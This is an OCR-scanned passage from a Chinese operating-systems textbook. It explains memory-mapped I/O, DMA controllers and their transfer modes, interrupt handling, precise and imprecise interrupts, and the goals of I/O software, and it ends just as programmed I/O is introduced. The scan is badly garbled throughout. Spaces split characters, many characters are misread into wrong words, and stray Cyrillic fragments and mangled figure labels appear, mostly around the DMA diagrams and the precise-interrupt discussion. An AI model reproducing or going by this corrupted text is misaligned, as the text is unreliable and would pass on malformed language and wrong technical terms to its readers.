第 二 种 可 能 的 设计 是 在 内 存 总 线 上 放置 一 个 探查 设备 ， 放 过 所 有 潜在 地 指向 所 关注 的 1/O 设 备 的 地 
址 。 此 处 的 问题 是 ， 1/O 设 备 可 能 无 法 以 内 存 所 能 达到 的 速度 处 理 请 求 。 

第 三 种 可 能 的 设计 是 在 PCI 桥 芯片 中 对 地 址 进行 过 小， 这 正 是 图 1-12 中 Pentium 结 构 上 所 使 用 的 。 该 
芯片 中 包含 若干 个 在 引导 时 预 装载 的 范围 寄存 器 。 例 如 ， 640K 到 1M-! 可 能 被 标记 为 非 内 存 范围 。 洲 在 
标记 为 非 内 存 的 那些 范围 之 内 的 地 址 将 被 转发 给 PCI 总 线 而 不 是 内 存 。 这 一 设计 的 缺点 是 需要 在 引导 时 
判定 哪些 内 存 地 址 不 是 真正 的 内 存 地 址 。 因 而 ， 每 一 设计 都 有 支持 它 和 反对 它 的 论据 ， 所 以 折 中 和 权衡 
是 不 可 避免 的 。 

5.1.4 直接 存储 器 存 取 

无 论 一 个 CPU 是 否 具有 内 存 映射 IO， 它 都 需要 寻 址 设备 控制 器 以 便 与 它们 交换 数据 。 CPU 可 以 从 
1/0 控 制 器 每 次 请 求 一 个 字 节 的 数据 ， 但 是 这 样 做 浪费 CPU 的 时 间 ， 所 以 经 常用 到 一 种 称 为 直接 存储 器 
ÄM (Direct Memory Access, DMA) 的 不 同方 案 。 只 有 硬件 具有 DMA 控 制 器 时 操作 系统 才能 使 用 
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DMA， 而 大 多 数 系统 都 有 DMA 控 制 器 。 有 时 DMA 控 制 器 集成 到 磁盘 控制 器 和 其 他 控制 器 之 中 ， 但 是 这 
样 的 设计 要 求 每 个 设备 有 一 个 单独 的 DMA 控 制 器 。 更 加 普遍 的 是 ， 只 有 一 个 DMA 控 制 器 可 利用 〈 例 如 ， 
在 主板 上 )， 由 它 调控 到 多 个 设备 的 数据 传送 ， 而 这 些 数据 传送 经 常 是 同时 发 生 的 。 

无 论 DMA 控 制 器 在 物理 上 处 于 什么 地 方 ， 它 都 能 够 独立 于 CPU 而 访问 系统 总 线 ， 如 图 5-4 所 示 。 它 
包含 车 干 个 可 以 被 CPU 读 写 的 寄存 器 ， 其 中 包括 一 个 内 存 地 址 寄存 器 、 一 个 字 节 计数 寄存 器 和 一 个 或 多 
个 控制 寄存 器 。 控 制 寄存 器 指定 要 使 用 的 IO 端口 、 传 送 方向 〈 从 IO 设备 读 或 写 到 IO 设备 ) 、 传 送 单位 
(每 次 一 个 字 节 或 每 次 一 个 字 ) 以 及 在 一 次 突 发 传送 中 要 传送 的 字 节 数 。 

1.CPU 对 g- каз 

DMA 控 制 器 

коре DMA 磁盘 
стан 控制 器 控制 器 


CPU 内 存 


2. DMA 请 求 传送 
[ensa J] 


图 5-4 DMA 传 送 操作 


为 了 解释 DMA 的 工作 原理 ， 让 我 们 首先 看 一 下 没有 使 用 DMA 时 磁盘 如 何 读 。 首 先 ， 控 制 器 从 磁盘 
驱动 器 串 行 地 、 一 位 一 位 地 读 一 个 块 (一 个 或 多 个 扁 区 )， 直 到 将 整 块 信息 放 入 控制 器 的 内 部 缓冲 区 中 。 
接着 ， 它 计算 校 验 和 ， 以 保证 没有 读 错 误 发 生 。 然 后 控制 器 产生 一 个 中 断 。 当 操作 系统 开始 运行 时 ， 它 
重复 地 从 控制 器 的 缓冲 区 中 一 次 一 个 字 节 或 一 个 字 地 读 取 该 块 的 信息 ， 并 将 其 存 人 内 存 中 。 

使 用 DMA 时 ， 过 程 是 不 同 的 。 首 先 ，CPU 通 过 设置 DMA 控 制 器 的 寄存 器 对 它 进 行 编程 ， 所 以 DMA 
控制 器 知道 将 什么 数据 传送 到 什么 地 方 (图 5-4 中 的 第 1 步 )。DMA 控 制 器 还 要 向 磁盘 控制 器 发 出 一 个 合 
令 ， 通 知 它 从 磁盘 读数 据 到 其 内 部 的 缓冲 区 中 ， 并 且 对 校 验 和 进行 检验 。 如 果 磁 盘 控 制 器 的 缓冲 区 中 的 
数据 是 有 效 的， 那么 DMA 就 可 以 开始 了 。 

DMA 控 制 器 通过 在 总 线 上 发 出 一 个 读 请 求 到 磁盘 控制 器 而 发 起 DMA 传 送 (第 2 步 )。 这 一 读 请 求 看 
起 来 与 任何 其 他 读 请 求 是 一 样 的 ， 并 且 磁 盘 控 制 器 并 不 知道 或 者 并 不 关心 它 是 来 自 CPU 还 是 来 自 DMA 
控制 器 。 一 般 情 况 下 ， 要 写 的 内 存 地 址 在 总 线 的 地 址 线 上 ， 所 以 当 磁盘 控制 器 从 其 内 部 缓冲 区 中 读 取 下 
一 个 字 的 时 候 ， 它 知道 将 该 字 写 到 什么 地 方 。 写 到 内 存 是 另 一 个 标准 总 线 周期 (第 3 步 )。 当 写 操作 完成 
时 ， 磁 盘 控制 器 在 总 线 上 发 出 一 个 应 答 信 号 到 DMA 控 制 器 (第 4 步 )。 于 是 ，DMA 控 制 器 步 增 要 使 用 的 
内 存 地 址 ， 并 且 步 碱 字 节 计 数 。 如 果 字 节 计数 仍然 大 于 0， 则 重复 第 2 步 到 第 4 步 ， 直 到 字 节 计数 到 达 0。 
此 时 ，DMA 控 制 器 将 中 断 CPU 以 便 让 CPU 知道 传送 现在 已 经 完成 了 。 当 操作 系统 开始 工作 时 ， 用 不 着 
将 磁盘 块 复制 到 内 存 中 ， 因 为 它 已 经 在 内 存 中 了 。 

DMA 控 制 器 在 复杂 性 方面 的 区 别 相当 大 。 最 简单 的 DMA 控 制 器 每 次 处 理 一 路 传送 ， 如 上 面 所 描述 
的 。 复 杂 一 些 的 DMA 控 制 器 经 过 编程 可 以 一 次 处 理 多 路 传送 ， 这 样 的 控制 器 内 部 具有 多 组 寄存 器 ， 每 
一 通道 一 组 寄存 器 。CPU 通 过 用 与 每 路 传送 相关 的 参数 装载 每 组 寄存 器 而 开始 。 每 路 传送 必须 使 用 不 同 
的 设备 控制 器 。 在 图 5-4 中 ， 传 送 每 一 个 字 之 后 ，DMA 控 制 器 要 决定 下 一 次 要 为 哪 一 设备 提供 服务 。 
DMA 控 制 器 可 能 被 设置 为 使 用 轮转 算法 ， 它 也 可 能 具有 一 个 优先 级 规划 设计 ， 以 便 让 某 些 设备 受到 比 
其 他 设备 更 多 的 照顾 。 假 如 存在 一 个 明确 的 方法 分 辨 应 答 信号 ， 那 么 在 同一 时 间 就 可 以 挂 起 对 不 同 设备 
控制 器 的 多 个 请 求 。 出 于 这 样 的 原因 ， 经 常 将 总 线 上 不 同 的 应 答 线 用 于 每 一 个 DMA 通 道 。 

许多 总 线 能 够 以 两 种 模式 操作 ， 每 次 一 字模 式 和 块 模式 。 某 些 DMA 控 制 器 也 能 够 以 这 两 种 模式 操 
作 。 在 前 一 个 模式 中 ， 操 作 和 如 上 所 述 : DMA 控 制 器 请 求 传送 一 个 字 并 且 得 到 这 个 字 。 如 果 CPU 也 想 使 
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用 总 线 ， 它 必须 等 待 。 这 一 机 制 称 为 周期 窗 取 (cycle stealing)， 因 为 设备 控制 器 偶尔 偷偷 溜 人 并 且 从 
CPU 偷 走 一 个 临时 的 总 线 周期 ， 从 而 轻微 地 延迟 CPU。 在 块 模式 中 ，DMA 控 制 器 通知 设备 获得 总 线 ， 
发 起 一 连 串 的 传送 ， 然 后 释放 总 线 。 这 一 操作 形式 称 为 突 发 模式 (burst mode)。 它 比 周期 窃取 效率 更 
因为 获得 总 线 占用 了 时 间 ， 并 且 以 一 次 总 线 获 得 的 代价 能 够 传送 多 个 字 。 突 发 模式 的 缺点 是 ， 如 果 正 在 
进行 的 是 长 时 间 突 发 传送 ， 有 可 能 将 CPU 和 其 他 设备 阻塞 相当 长 的 周期 。 

在 我 们 一 直 讨 论 的 模型 有 时 称 为 飞越 模式 (fly-by mode) 中 ，DMA 控 制 器 通知 设备 控制 器 直 
接 将 数据 传送 到 主 存 。 某 些 DMA 控 制 器 使 用 的 其 他 模式 是 让 设备 控制 器 将 字 发 送 给 DMA 控 制 器 ，DMA 
控制 器 然后 发 起 第 2 个 总 线 请 求 将 该 字 写 到 它 应 该 去 的 任何 地 方 。 采 用 这 种 方案 ， 每 传送 一 个 字 需 要 一 
个 额外 的 总 线 周期 ， 但 是 更 加 灵活 ， 因 为 它 可 以 执行 设备 到 设备 的 复制 甚至 是 内 存 到 内 存 的 复制 (通过 
首先 发 起 一 个 到 内 存 的 读 ， 然 后 发 起 一 个 到 不 同 内 存 地 址 的 写 ) 。 

大 多 数 DMA 控 制 器 使 用 物理 内 存 地 址 进行 传送 。 使 用 物理 地 址 要 求 操作 系统 将 预期 的 内 存 缓冲 区 
的 虚拟 地 址 转换 为 物理 地 址 ， 并 且 将 该 物理 地 址 写 人 DMA 控 制 器 的 地 址 寄存 器 中 。 在 少数 DMA 控 制 器 
中 使 用 的 一 个 替代 方案 是 将 虚拟 地 址 写 信 DMA 控 制 器 ， 然 后 DMA 控 制 器 必须 使 用 MMU 来 完成 虚拟 地 址 
到 物理 地 址 的 转换 。 只 有 在 MMU 是 内 存 的 组 成 部 分 (有 可 能 ， 但 罕见 ) 而 不 是 CPU 的 组 成 部 分 的 情况 
下 ， 才 可 以 将 虚拟 地 址 放 到 总 线 上 。 

我 们 在 前 面 提 到 ， 在 DMA 可 以 开始 之 前 ， 磁 盘 首先 要 将 数据 读 和 人 其 内 部 的 缓冲 区 中 。 你 也 许 会 产 
ERER: 为 什么 控制 器 从 磁盘 读 取 字 节 后 不 立即 将 其 存储 在 主 存 中 ? 换 名 话说， 为 什么 需要 一 个 内 部 组 
钟 区 ?有 两 个 原因 。 首 先 ， 通 过 进行 内 部 缓冲 ， 磁 盘 控制 器 可 以 在 开始 传送 之 前 检验 校 验 和 。 如 果 校 验 
和 是 错误 的 ， 那 么 将 发 出 一 个 表明 错误 的 信号 并 且 不 会 进行 传送 。 

第 二 个 原因 是 ， 一 旦 磁盘 传送 开始 工作 ， 从 磁盘 读 出 的 数据 就 是 以 固定 速率 到 达 的 ， 而 不 论 控 制 器 
是 否 准备 好 接收 数据 。 如 果 控制 器 要 将 数据 直接 写 到 内 存 ， 则 它 必须 为 要 传送 的 每 个 字 取得 系统 总 线 的 
控制 权 。 此 时 ， 若 由 于 其 他 设备 使 用 总 线 而 导致 总 线 忙 (例如 在 突 发 模式 中 )， 则 控制 器 只 能 等 待 。 如 
果 在 前 一 个 磁盘 字 还 未 被 存储 之 前 下 一 个 磁盘 字 到 达 ， 控 制 器 只 能 将 它 存放 在 某 个 地 方 。 如 果 总 线 非常 
忙 ， 控 制 器 可 能 需要 存储 很 多 字 ， 而 且 还 要 完成 大 量 的 管理 工作 。 如 果 块 被 放 入 内 部 缓冲 区 ， 则 在 
DMA 启 动 前 不 需要 使 用 总 线 ， 这 样 ， 控 制 器 的 设计 就 可 以 简化 ， 因 为 对 DMA 到 内 存 的 传送 没有 严格 的 
时 间 要 求 。( 事 实 上 ， 有 些 老式 的 控制 器 是 直接 存 取 内 存 的 ， 其 内 部 缓冲 区 设计 得 很 小 ， 但 是 当 总 线 很 
忙 时 ， 一 些 传送 有 可 能 由 于 超载 运行 错误 而 被 终止 。) 

并 不 是 所 有 的 计算 机 都 使 用 DMA。 反 对 的 论据 是 主 CPU 通 常 要 比 DMA 控 制 器 快 得 多 ， 做 同样 的 工 
作 可 以 更 快 ( 当 限制 因素 不 是 1/O 设 备 的 速度 时 )。 如 果 CPU 没 有 其 他 工作 要 做 ， 让 (快速 的 ) CPU 等 待 
( 慢 速 的 ) DMA 控 制 器 完成 工作 是 无 意义 的 。 此 外 ， 去 除 DMA 控 制 器 而 让 CPU 用 软件 做 所 有 的 工作 还 可 
以 节约 金钱 ， 这 一 点 在 低 端 (КАД) 计算 机 上 十 分 重要 。 


5.1.5 重 温 中 断 

我 们 在 1.4.5 节 中 简要 介绍 了 中 断 ， 但 是 还 有 更 多 的 内 容 要 介绍 。 在 一 台 典型 的 个 人 计算 机 系统 中 ， 
中 断 结构 如 图 5-5 所 示 。 在 硬件 层面 ， 中 断 的 工作 如 下 所 述 。 当 一 个 UO 设 备 完成 交 给 它 的 工作 时 ， 它 就 
产生 一 个 中 断 〈 假 设 操作 系统 已 经 开放 中 断 ) ， 它 是 通过 在 分 配给 它 的 一 条 总 线 信号 线 上 置 起 信号 而 产 
生 中 上 断 的 。 该 信号 被 主板 上 的 中 断 控制 器 芯片 检测 到 ， 由 中 断 控制 器 芯片 决定 做 什么 。 


1. 设备 完成 工作 


CPU 


3. CPU 响应 ”中断 控制 器 
Ф 


58 
图 5-5 中 断 是 怎样 发 生 的 。 设备 与 中 断 控制 器 之 间 的 连接 实际 上 使 用 的 是 总 线 上 的 中 断 线 而 不 是 专用 连 线 
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如 果 没 有 其 他 中 断 悬 而 未 决 ， 中 断 控 制 器 将 立刻 对 中 断 进行 处 理 。 如 果 有 另 一 个 中 断 正在 处 理 中 ， 
或 者 另 一 个 设备 在 总 线 上 具有 更 高 优先 级 的 一 条 中 断 请 求 线 上 同时 发 出 中 断 请 求 ， 该 设备 将 暂时 不 被 理 
肯 。 在 这 种 情况 下 ， 该 设备 将 继续 在 总 线 上 置 起 中 断 信号 ， 直 到 得 到 CPU 的 服务 。 

为 了 处 理 中 断 ， 中 断 控制 器 在 地 址 线 上 放置 一 个 数字 表明 哪个 设备 需要 关注 ， 并 且 置 起 一 个 中 断 
CPU 的 信号 。 

中 断 信号 导致 CPU 停止 当前 正在 做 的 工作 并 且 开始 做 其 他 的 事情 。 地 址 线 上 的 数字 被 用 做 指向 一 个 
FKA Pié (interrupt vector) 的 表格 的 索引 ， 以 便 读 取 一 个 新 的 程序 计数 器 。 这 一 程序 计数 器 指向 
相应 的 中 上 断 服务 过 程 的 开始 。 一 般 情况 下 ， 陷 阱 和 中 断 从 这 一 点 上 看 使 用 相同 的 机 制 ， 并 且 常 常 共享 相 
同 的 中 断 向 量 。 中 断 向 量 的 位 置 可 以 硬 布线 到 机 器 中 ， 也 可 以 在 内 存 中 的 任何 地 方 通过 一 个 CPU 寄存 器 
(由 操作 系统 装载 ) 指向 其 起 点 。 

中 断 服务 过 程 开始 运行 后 ， 它 立 刻 通过 将 一 个 确定 的 值 写 到 中 断 控 制 器 的 某 个 LO 端口 来 对 中 断 做 
出 应 答 。 这 一 应 答 告诉 中 断 控制 器 可 以 自由 地 发 出 另 一 个 中 断 。 通 过 让 CPU 延迟 这 -应 答 直到 它 准 备 好 
处 理 下 一 个 中 断 ， 就 可 以 避免 与 多 个 几乎 同时 发 生 的 中 断 相 牵涉 的 竞争 状态 。 说 句 题 外 的 话 ， 某 些 ( 老 
式 的 ) 计算 机 没有 集中 的 中 断 控制 器 ， 所 以 每 个 设备 控制 器 请 求 自己 的 中 断 。 

在 开始 服务 程序 之 前 ， 硬 件 总 是 要 保存 一 定 的 信息 。 哪些 信息 要 保存 以 及 将 其 保存 到 什么 地 方 ， 不 
同 的 CPU 之 间 存在 巨大 的 差别 。 作 为 最 低 限 度 ， 必 须 保存 程序 计数 器 ， 这 样 被 中 断 的 进程 才能 够 重新 开 
始 。 在 另 一 个 极端 ， 所 有 可 见 的 寄存 器 和 很 多 内 部 寄存 器 或 许 也 要 保存 。 

将 这 些 信息 保存 到 什么 地 方 是 一 个 问题 。 一 种 选择 是 将 其 放 入 内 部 寄存 器 中 ， 在 需要 时 操作 系统 可 
以 读 出 这 些 内 部 寄存 器 。 这 一 方法 的 问题 是 ， 中 断 控制 器 之 后 无 法 得 到 应 答 ， 直到 所 有 可 能 的 相关 信息 
被 读 出 ， 以 免 第 二 个 中 断 重 写 内 部 寄存 器 保存 状态 。 这 一 策略 在 中 断 被 禁止 时 将 导致 长 时 间 的 死机 ， 并 
且 可 能 丢失 中 断 和 丢失 数据 。 

因此 ， 大 多 数 CPU 在 堆栈 中 保存 信息 。 然 而 ， 这 种 方法 也 有 问题 。 首 先 ， 使 用 谁 的 堆栈 ?如 果 使 用 
当前 堆栈 ， 则 它 很 可 能 是 用 户 进程 的 堆栈 。 堆 栈 指针 甚至 可 能 不 是 合法 的 ， 这 样 当 硬件 试图 在 它 所 指 的 
地 址 处 写 某 些 字 时 ， 将 导致 致命 错误 。 此 外 ， 它 可 能 指向 一 个 页 面 的 末端 。 若干 次 内 存 写 之 后 ， 页 面 边 
界 可 能 被 超出 并 且 产 生 一 个 页 面 故障 。 在 硬件 中 断 处 理 期 间 如 果 发 生 页 面 故障 将 引起 更 大 的 问题 : 在 何 
处 保存 状态 以 处 理 页 面 故 障 ? 

如 果 使 用 内 核 堆 栈 ， 将 存在 更 多 的 堆栈 指针 是 合法 的 并 且 指向 一 个 固定 的 页 面 的 机 会 。 然而 ， 切 换 
到 核心 态 可 能 要 求 改变 MMU 上 下 文 ， 并 且 可 能 使 高 速 缓存 和 TLB 的 大 部 分 或 全 部 失效 。 静态 地 或 动态 
地 重新 装载 所 有 这 些 东 西 将 增加 处 理 一 个 中 断 的 时 间 ， 因 而 浪费 CPU 的 时 间 。 

精确 中 断 和 不 精确 中 断 - 

另 一 个 问题 是 由 下 面 这 样 的 事实 引起 的 : 现代 CPU 大 量 地 采用 流水 线 并 且 有 时 还 采用 超标 量 (内 部 
并 行 )。 在 老式 的 系统 中 ， 每 条 指令 完成 执行 之 后 ， 微 程序 或 硬件 将 检查 是 否 存在 悬而未决 的 中 断 。 如 
果 存 在 ， 那 么 程序 计数 器 和 PSW 将 被 压 人 堆栈 中 而 中 断 序列 将 开始 。 在 中 断 处 理 程序 运行 之 后 ， 相 反 的 
过 程 将 会 发 生 ， 旧 的 PSW 和 程序 计数 器 将 从 堆栈 中 弹出 并 且 先 前 的 进程 继续 运行 。 

这 一 模型 使 用 了 隐 含 的 假设 ， 这 就 是 如 果 一 个 中 断 正好 在 某 一 指令 之 后 发 生 ， 那么 这 条 指令 前 的 所 
有 指令 (包括 这 条 指令 ) 都 完整 地 执行 过 了 ， 而 这 条 指令 后 的 指令 一 条 也 没有 执行 。 在 老式 的 机 器 上 ， 
这 一 假设 总 是 正确 的 ， 而 在 现代 计算 机 上 ， 这 一 假设 则 未 必 是 正确 的 。 

首先 ， 考 虑 图 1-6a 的 流水 线 模型 。 在 流水 线 满 的 时 候 (通常 的 情形 ) ， 如 果 出 现 一 个 中 断 ， 那 么 会 
发 生 什么 情况 ?许多 指令 正 处 于 各 种 不 同 的 执行 阶段 ， 当 中 断 出 现时 ， 程序 计数 器 的 值 可 能 无 法 正确 地 
反映 已 经 执行 过 的 指令 和 尚未 执行 的 指令 之 间 的 边界 。 事 实 上 ， 许 多 指令 可 能 部 分 地 执行 了 ， 不 同 的 指 
令 完成 的 程度 或 多 或 少 。 在 这 种 情况 下 ， 程序 计数 器 更 有 可 能 反映 的 是 将 要 被 取出 并 压 人 流水 线 的 下 一 
条 指令 的 地 址 ， 而 不 是 刚刚 被 执行 单元 处 理 过 的 指令 的 地 址 。 

在 如 图 1-7b 所 示 的 超标 量 计算 机 上 ， 事 情 更 加 精 糕 。 指 令 可 能 分 解 成 微 操作 ， 而 微 操作 有 可 能 乱 序 
执行 ， 这 取决 于 内 部 资源 (如 功能 单元 和 寄存 器 ) 的 可 用 性 。 当中 断 发 生 时 ， 某 些 很 久 以 前 启动 的 指令 
可 能 还 没 开始 执行 ， 而 其 他 最 近 启动 的 指令 可 能 几乎 要 完成 了 。 当中 断 信号 出 现时 ， 可 能 存在 许多 指令 
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处 于 不 同 的 完成 状态 ， 它 们 与 程序 计数 器 之 间 没有 什么 关系 。 

将 机 器 留 在 一 个 明确 状态 的 中 断 称 为 精确 中 断 (precise interrupt) (Walker 和 Cragon，1995)。 精 确 
中 断 具 有 4 个 特性 : 

1) PC (程序 计数 器 ) 保存 在 一 个 已 知 的 地 方 。 

2) PC 所 指向 的 指令 之 前 的 所 有 指令 已 经 完全 执行 。 

3) PC 所 指向 的 指令 之 后 的 所 有 指令 都 没有 执行 。 

4) PC 所 指向 的 指令 的 执行 状态 是 已 知 的 。 

注意 ， 对 于 PC 所 指向 的 指令 之 后 的 那些 指令 来 说 ， 此 处 并 没有 禁止 它们 开始 执行 ， 而 只 是 要 求 在 


中 断 发 生 之 前 必须 撤销 它们 对 寄存 器 或 内 存 所 ани ун 
做 的 任何 修改 。PC 所 指向 的 指令 有 可 能 已 经 执 [ишетү n тна — 228 
行 了 ， 也 有 可 能 还 没有 执行 ， 然 而 ， 必 须 清楚 ti seo [за aa 
省。 和 oa aan ae 
中 断 ， 那 么 指令 就 会 还 没有 开始 执行 。 然 而 ， SAE tas 
如 果 中 断 实际 上 是 一 个 陷阱 或 者 页 面 故 障 ， 那 Ее, ааз, 
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么 PC-- 般 指向 导致 错误 的 指令 ， 所 以 它 以 后 可 
以 重新 开始 执行 。 图 5-6a 所 示 的 情形 描述 了 精 856 DRAPE, b 不 精确 中 上 断 

确 中 断 。 程 序 计数 器 (316) 之 前 的 所 有 指令 都 已 经 完成 了 ， 而 它 之 后 的 指令 都 还 没有 启动 (或 者 已 经 
回 退 以 投 销 它们 的 作用 )。 

不 满足 这 些 要 求 的 中 断 称 为 不 精确 中 断 (imprecise interrupt) ， 不 精确 中 断 使 操作 系统 编写 者 过 得 
极为 不 愉快 ， 现 在 操作 系统 编写 者 必须 断定 已 经 发 生 了 什么 以 及 还 要 发 生 什么 。 图 5-6b 描 述 了 不 精确 中 
断 ， 其 中 邻近 程序 计数 器 的 不 同 指令 处 于 不 同 的 完成 状态 ， 老 的 指令 不 一 定 比 新 的 指令 完成 得 更 多 。 具 
有 不 精确 中 断 的 机 器 通常 将 大 量 的 内 部 状态 “吐出 ”到 堆 校 中 ， 从 而 使 操作 系统 有 可 能 浏 断 出 正在 发 生 
什么 事情 。 重 新 启动 机 器 所 必需 的 代码 通常 极其 复杂 。 此 外 ， 在 每 次 中 断 发 生 时 将 大 攻 的 信息 保存 在 内 
存 中 使 得 中 断 响应 十 分 绥 慢 ， 而 快 复 则 更 加 精 楼 。 这 就 导致 具有 讽刺 意味 的 情形 ， 由 于 级 慢 的 中 断 使 得 
提 常 快速 的 超标 量 CPU 有 时 并 不 适合 实时 工作 。 

有 些 计算 机 设计 成 基 些 种 类 的 中 断 和 陷阱 是 精确 的 ， 而 其 他 的 不 是 。 例 如 ， 可 以 让 UO 中 断 是 精确 
的 ， 而 归 因 于 致命 编程 错误 的 陷 叶 是 不 精确 的 ， 由 于 在 被 0 除 之 后 不 需要 尝试 重新 开始 运行 的 进程 ， 所 
以 这 样 做 也 不 错 。 有 些 计算 机 具有 一 个 位 ， 可 以 设置 它 强 筷 所 有 的 中 断 才 是 精确 的 。 设 置 这 一 位 的 不 
之 处 是 ， 它 强迫 CPU 仔 细 好 将 正在 做 的 一 切 事情 记 入 日 志 并 且 维 护 寄存 器 的 影子 副本 ， 这 样 才能 能 在 任 
意 时 刻 生成 精确 中 断 。 所 有 这 些 开销 都 对 性 能 具有 较 大 的 影响 。 

某 些 超标 量 计算 机 (例如 Pentium 系 列 ) 具有 精确 中 断 ， 从 而 使 老 的 软件 正确 工作 。 为 精确 中 断 付 
出 的 代价 是 CPU 内 部 极其 复杂 的 中 断 带 缉 ， 以 便 确保 当中 断 控 制 器 发 出 信号 起 要 导 残 一 个 中 上 断 时 ， 克 许 
直到 革 一 点 之 前 的 所 有 指令 完成 而 不 克 许 这 一 点 之 后 的 指令 对 机 器 状态 产生 任何 重要 的 影响 。 此 处 何 出 
的 代价 不 是 在 时 间 上 ， 而 是 在 芯片 面积 和 设计 复杂 性 上 。 如 果 不 是 因为 向 后 羔 容 的 目的 而 要 求 精确 中 断 
的 笑 ， 这 一 蔚 片 面积 就 可 以 用 于 更 大 的 片上 高 速 缓存 ， 从 而 使 CPU 的 速度 更 快 。 另 一 方面， 不 精确 中 电 
使 得 操作 系统 更 为 复杂 而 且 运行 得 更 加 缓慢 ， 所 以 断定 哪 一 种 方法 更 好 是 十 分 国难 的 


5.2 1/O 软 件 原理 


在 讨论 了 VO 硬件 之 后 ， 下 面 我 们 来 看 一 看 1/O 软 件 。 首先 我 们 将 看 一 看 1/O 软 件 的 目标 ， 然 后 从 操作 
系统 的 观点 来 看 一 看 MO 实现 的 不 同方 法 。 


5.2.1 1/O 软 件 的 目标 

在 设计 IO 软件 时 一 个 关键 的 概念 是 设备 独立 性 (device independence)。 它 的 意思 是 应 该 能 够 编写 
出 这 样 的 程序 ， 它 可 以 访问 任意 1/O 设 备 而 无 需 事 先 指定 设备 。 例如 ， 读 取 一 个 文件 作为 输入 的 程序 应 
该 能 够 在 硬盘 、CD-ROM、DYVD 或 者 USB 盘 上 读 取 文件 ， 无 需 为 每 一 种 不 同 的 设备 修改 程序 。 类 似 地 ， 
用 户 应 该 能 够 键入 这 样 一 条 命令 
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sort <input> output 
并 且 无 论 输 入 来 自任 意 类 型 的 存储 盘 或 者 键盘 ， 输 出 送 往 任意 类 型 的 存储 盘 或 者 屏幕 ， 上 述 命令 都 可 以 
工作 。 尽 管 这 些 设备 实际 上 差别 很 大 ， 需 要 非常 不 同 的 命令 序列 来 读 或 写 ， 但 这 一 事实 所 带 来 的 问题 将 
由 操作 系统 负责 处 理 。 

与 设备 独立 性 密切 相关 的 是 统一 命名 (uniform naming) 这 一 目标 。 一 个 文件 或 一 个 设备 的 名 字 应 
该 是 一 个 简单 的 字符 串 或 一 个 整数 ， 它 不 应 依赖 于 设备 。 在 UNIX 系 统 中 ， 所 有 存储 盘 都 能 以 任意 方式 
集成 到 文件 系统 层次 结构 中 ， 因 此 ， 用 户 不 必 有 知道 哪个 名 字 对 应 于 哪 台 设备 。 例 如 ， 一 个 USB 盘 可 以 安 
装 (mount) 到 目录 /usr/ast/backup 下 ， 这 样 复制 一 个 文件 到 /usr/ast/backup/monday 就 是 将 文件 复制 到 
USB 盘 上 。 用 这 种 方法 ， 所 有 文件 和 设备 都 采用 相同 的 方式 一 一 路 径 名 进行 寻 址 。 

IO 软件 的 另 一 个 重要 问题 是 错误 处 理 (error handling)。 一 般 来 说 ， 错 误 应 该 尽 可 能 地 在 接近 硬件 
的 层面 得 到 处 理 。 当 控制 器 发 现 了 一 个 读 错误 时 ， 如 果 它 能 够 处 理 那么 就 应 该 自己 设法 纠正 这 一 错误 。 
如 果 控 制 器 处 理 不 了 ， 那 么 设备 驱动 程序 应 当 予 以 处 理 ， 可 能 只 需 重读 一 次 这 块 数据 就 正确 了 。 很 多 错 
误 是 偶然 性 的 ， 例 如 ， 磁 盘 读 写 头 上 的 灰尘 导致 读 写 错 误 时 ， 重 复 该 操作 ， 错 误 经 常 就 会 消失 。 只 有 在 
低层 软件 处 理 不 了 的 情况 下 ， 才 将 错误 上 交 高 层 处 理 。 在 许多 情况 下 ， 错 误 恢复 可 以 在 低层 透明 地 得 到 
解决 ， 而 高 层 软件 甚至 不 知道 存在 这 一 错误 。 

另 一 个 关键 问题 是 同步 (synchronous) ( 即 阻塞 ) 和 异步 (asynchronous) {〈 即 中 断 驱动 ) 传输 。 大 
多 数 物理 IO 是 异步 的 一 一 CPU 启动 传输 后 便 转 去 做 其 他 工作 ， 直 到 中 断 发 生 。 如 果 IO 操 作 是 阻塞 的 ， 
那么 用 户 程序 就 更 加 容易 编写 一 一 在 read 系 统 调用 之 后 ， 程 序 将 自动 被 挂 起 ， 直 到 缓冲 区 中 的 数据 准备 
好 。 正 是 操作 系统 使 实际 上 是 中 断 驱 动 的 操作 变 为 在 用 户 程序 看 来 是 阻塞 式 的 操作 。 

VO 软件 的 另 一 个 问题 是 缓冲 (buffering)。 数 据 离开 一 个 设备 之 后 通常 并 不 能 直接 存放 到 其 最 终 的 
目的 地 。 例 如 ， 从 网 络 上 进来 一 个 数据 包 时 ， 直 到 将 该 数据 包 存放 在 某 个 地 方 并 对 其 进行 检查 ， 操 作 系 
统 才 知道 要 将 其 置 于 何 处 。 此 外 ， 某 些 设备 具有 严格 的 实时 约束 例如， 数字 音频 设备 ) ， 所 以 数据 必 
须 预先 放置 到 输出 缓冲 区 之 中 ， 从 而 消除 缓冲 区 填 满 速率 和 缓冲 区 清空 速率 之 间 的 相互 影响 ， 以 避免 组 
冲 区 欠 载 。 缓 冲 涉及 大 量 的 复制 工作 ， 并 且 经 常 对 UO 性 能 有 重大 影响 。 

此 处 我 们 将 提 到 的 最 后 一 个 概念 是 共享 设备 和 独占 设备 的 问题 。 有 些 1O 设 备 (如 磁盘 ) 能 够 同时 
让 多 个 用 户 使 用 。 多 个 用 户 同时 在 同一 磁盘 上 打开 文件 不 会 引起 什么 问题 。 其 他 设备 (如 磁带 机 ) 则 必 
须 由 单个 用 户 独 占 使 用 ， 直 到 该 用 户 使 用 完 ， 另 一 个 用 户 才能 拥有 该 磁带 机 。 让 两 个 或 更 多 的 用 户 随机 
地 将 交叉 混杂 的 数据 块 写 人 相同 的 磁带 是 注定 不 能 工作 的 。 独 占 ( 非 共 享 ) 设备 的 引入 也 带 来 了 各 种 各 
样 的 问题 ， 如 死 锁 。 同 样 ， 操 作 系统 必须 能 够 处 理 共享 设备 和 独占 设备 以 避免 问题 发 生 。 


5.2.2 程序 控制 |/O 

IO 可 以 以 三 种 根本 不 同 的 方式 实现 。 在 本 小 节 中 我 们 将 介绍 第 一 种 《程序 控制 IO) ， 在 后 面 两 小 
节 中 我 们 将 研究 另外 两 种 〈 中 断 驱 动 O 和 使 用 DMA 的 UO) 。1/O 的 最 简单 形式 是 让 CPU 做 全 部 工作 ， 这 
一 方法 称 为 程序 控制 IJO (programmed IO) 。 

借助 于 例子 来 说 明 程序 控制 JO 是 最 简单 的 。 考 虑 一 个 用 户 进程 ， 该 进程 想 在 打印 机 上 打印 8 个 字符 
的 字符 串 “ABCDEFGH"。 它 首先 要 在 用 户 空间 的 一 个 缓冲 区 中 组 装 字符 串 ， 如 图 5-7a 所 示 。 

